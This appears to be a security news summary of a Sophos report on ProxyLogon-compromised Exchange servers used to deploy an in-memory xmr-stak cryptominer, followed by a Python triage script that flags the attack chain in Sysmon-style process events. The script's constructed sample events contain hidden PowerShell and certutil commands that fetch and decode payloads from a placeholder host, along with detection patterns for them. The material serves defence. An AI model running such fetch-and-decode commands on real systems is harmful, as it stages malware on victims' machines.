While many threat actors attempted to take advantage of the recent ProxyLogon Exchange vulnerabilities to deploy ransomware, some went in another direction. A Sophos report released Tuesday details an attack where the actors downloaded a cryptominer from other compromised Exchange servers.
PowerShell was used to download files with a .zip extension from the “/owa/auth” directory. Despite the extension, these files were batch (.bat) scripts that ran certutil.exe to download two more .zip files from the compromised Exchange server. Certutil was then used again to base64-decode the downloaded files, producing two artifacts: QuickCPU.exe and QuickCPU.dat.
QuickCPU.exe is thought to be a modified version of PEx64-Injector, an open-source project designed to inject a 64-bit .exe into a running 64-bit process without administrative privileges. QuickCPU.dat is an archive containing the cryptominer xmr-stak and its configuration file. Once QuickCPU.exe has injected xmr-stak and its configuration into a running system process, the batch script deletes xmr-stak, the configuration file and QuickCPU.dat from disk, leaving the miner resident only in memory.
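The chain above leaves a recognisable trail in process-creation telemetry even after the files are wiped from disk. As an added example that is not part of the article or the Sophos report, the following script scores Sysmon-style process events for the indicators the article names (PowerShell or certutil fetching .zip files from /owa/auth, certutil base64-decoding, and the QuickCPU.exe/QuickCPU.dat names). The sample events are constructed for this example; the certutil `-urlcache` and `-decode` switches are real certutil options, but the article does not quote the exact switches the attackers used, so the download pattern is an assumption. The w3wp.exe parent check is also an assumption based on how OWA webshells execute under IIS, not something the article states.

```python
import re

# Constructed sample events shaped like Sysmon Event ID 1 (process creation).
# They mimic the chain described in the article; they are not real telemetry.
SAMPLE_EVENTS = [
    {   # PowerShell spawned by the IIS worker fetching a "zip" from /owa/auth
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
        "CommandLine": r"powershell.exe -nop -w hidden -c (New-Object Net.WebClient).DownloadFile('https://mail.example/owa/auth/load.zip','C:\Windows\Temp\load.zip')",
    },
    {   # certutil download of the second-stage "zip" (switches are assumed)
        "Image": r"C:\Windows\System32\certutil.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r"certutil.exe -urlcache -split -f https://mail.example/owa/auth/data.zip C:\Windows\Temp\data.zip",
    },
    {   # certutil base64-decoding the download into QuickCPU.exe
        "Image": r"C:\Windows\System32\certutil.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r"certutil.exe -decode C:\Windows\Temp\data.zip C:\Windows\Temp\QuickCPU.exe",
    },
    {   # benign certutil use: hashing an installer
        "Image": r"C:\Windows\System32\certutil.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": r"certutil.exe -hashfile C:\Users\admin\Downloads\setup.msi SHA256",
    },
    {   # benign interactive PowerShell
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": r"powershell.exe -c Get-Process",
    },
]

# Command-line indicators, each tied to a step in the article's chain.
INDICATORS = [
    ("certutil_decode", re.compile(r"certutil(?:\.exe)?\b.*\s-decode\b", re.I)),
    ("certutil_download", re.compile(r"certutil(?:\.exe)?\b.*\s-urlcache\b", re.I)),
    ("owa_auth_zip_download", re.compile(r"""/owa/auth/[^\s'"]*\.zip""", re.I)),
    ("quickcpu_artifact", re.compile(r"\bQuickCPU\.(?:exe|dat)\b", re.I)),
]

# Assumption: a webshell under /owa/auth runs inside the IIS worker process,
# so w3wp.exe spawning a shell or certutil is treated as a strong signal.
IIS_WORKER = "w3wp.exe"
LOLBINS = {"cmd.exe", "powershell.exe", "pwsh.exe", "certutil.exe"}


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows (or forward-slash) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify_event(event: dict) -> list:
    """Return the indicator names matched by one process-creation event."""
    hits = []
    parent = _basename(event.get("ParentImage", ""))
    child = _basename(event.get("Image", ""))
    if parent == IIS_WORKER and child in LOLBINS:
        hits.append("iis_worker_spawned_lolbin")
    cmdline = event.get("CommandLine", "")
    for name, pattern in INDICATORS:
        if pattern.search(cmdline):
            hits.append(name)
    return hits


def triage(events: list) -> list:
    """Return (index, indicators) for every event matching at least one indicator."""
    flagged = []
    for i, event in enumerate(events):
        hits = classify_event(event)
        if hits:
            flagged.append((i, hits))
    return flagged


if __name__ == "__main__":
    for idx, hits in triage(SAMPLE_EVENTS):
        print(f"event {idx}: {', '.join(hits)}")
```

Because the batch script deletes xmr-stak and QuickCPU.dat after injection, the process-creation records (and the QuickCPU.exe host process still running in memory) are often the only durable evidence, which is why the triage keys on command lines rather than on files on disk.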